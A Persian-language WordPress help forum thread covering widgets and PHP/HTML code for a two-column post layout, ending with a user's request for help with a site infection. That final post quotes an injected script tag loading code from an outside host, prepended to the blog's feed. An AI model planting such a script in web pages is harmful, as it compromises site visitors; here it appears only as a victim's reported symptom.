سوالات و مشکلاتی که هنگام کار با وردپرس براتون پیش میاد رو مطرح کنید تا با همکاری دوستان جواب بدیم
:53:
نمایش نسخه قابل چاپ
سوالات و مشکلاتی که هنگام کار با وردپرس براتون پیش میاد رو مطرح کنید تا با همکاری دوستان جواب بدیم
:53:
من در خدمتم...
پ.ن: به خاطر کنکور و درس و مشق و ... فعلا فقط به سوالات و مشکلات جواب میدم. بعدا اگه وقت شد چیزایی که از وردپرس میدونم رو به صورت مقاله منتشر میکنم
خب در مورد ابزارك بگيد (كلي)
به قالب اضافه كنيم ؟ خوبه بده چطوره؟
بعضی از امکانات وردپرس یا افزونه هایی که نصب میکنید در قالب ابزارک ارائه میشه تا در صورتی که اونارو به ساید بار اضافه کنید داخل وبلاگ نمایش داده بشهنقل قول:
خب در مورد ابزارك بگيد (كلي)
مثل آخرین مطالب یا اخرین نظرات یا لینک دوستان یا غیره و غیره
خوب یا بد بودنش هم... خوبه
خیلی از کارارو فقط با ابزارک میشه انجام داد
پ.ن: فعلا شب بخیر تا فردا..
چطور میشه یه قالب وردپرس رو به یه قالب دو ستونه و فروشگاهی تبدیل کرد؟
برای اینکار شما باید بیشتر با html آشنا باشین تا قالب وردپرس
یعنی باید اول روش درست کردن همین چیزی رو به صورت استاتیک در html بلد باشین
ما برای دو ستونه کردن باید دوتا div رو در کنار هم بزاریم
و این کار با تنظیم کردن float و with مناسب امکان پذیره
نمونه کد خیلی ساده برای این کار (بوردر رو برای این به fdiv ها اضافه کردم که حریمشون مشخص باشه)
خبکد:<div style="width: 400px; border: solid 1px red;">
<div style="float: right; width: 192px; border: dotted 1px blue; margin: 2px;">بلوک </div>
<div style="float: right; width: 192px; border: dotted 1px blue; margin: 2px;">بلوک </div>
</div>
تا اینجا ما یاد گریفتیم که div هارو کنار هم بزاریم و این اولین قدم برای نمایش دادن مطالب به صورت دو ستونه هست
حالا باید کدهای حلقه وردپرس رو با کدی شببیه اینی که من نوشتیم ترکیب کنیم تا مطالب جای اینکه در زیر هم نمایش داده بشن دوتا دوتا کنار هم باشن
و اینم کد نمونه از یه حلقه که اگه در پوسته تون ازش استفاده کنید پست ها دوتا دوتا کنار هم نمایش داده میشن یا به عبارتی در دو ستون
حالا فرضا اگه بخوایم که سه ستون از مطالب داشته باشیم باید عرض div اصلی (دربرگیرنده همه مطالب) و div های فرعی (مربوط به مطالب) رو طوری تنظیم کنیم که مرورگر بتونه سه تا از فرعی هارو در کنار هم در داخل اصلی نشون بده (چی گفتم ؟!)کد:<div style="width: 400px; border: solid 1px red;">
<?php if (have_posts()) : ?>
<?php while (have_posts()) : the_post(); ?>
<div style="float: right; width: 192px; border: dotted 1px blue; margin: 2px;">
<a title="<?php the_title(); ?>" href="<?php the_permalink(); ?>"><?php the_title(); ?></a>
<?php the_content(''); ?>
نویسنده: <?php the_author() ?> | تاریخ: <?php the_time('jS F Y');?> <?php the_time('');?> <br />
<?php comments_popup_link('بدون نظر', 'يک نظر','% نظر'); ?> <br /> | کلمات کليدي: <?php the_tags(',') ?>
</div>
<?php endwhile;?>
<?php endif; ?>
</div>
مشکل ویروس در وردپرس کمک کمک کمک
نقل قول:
xml parsing error: Not well-formed
line number 1, column 13:<script src=http://popgun5.com/images/gifimg.php ></script><?xml version="1.0" encoding="utf-8"?>
------------^
این کد دقیقا در کجای وردپرس هست و در چه صفحاتی نشون داده میشه ؟
همچین کدی قبلا تو کل فایل های js. خودشو نفوذ میداد
همرو می گرفتم تصفیه می کردم از تو فیدش نمیدونم از کجا لود می کرد
نمیدونم مشکلش یه
1 ماه بود مشکلی نداشت :((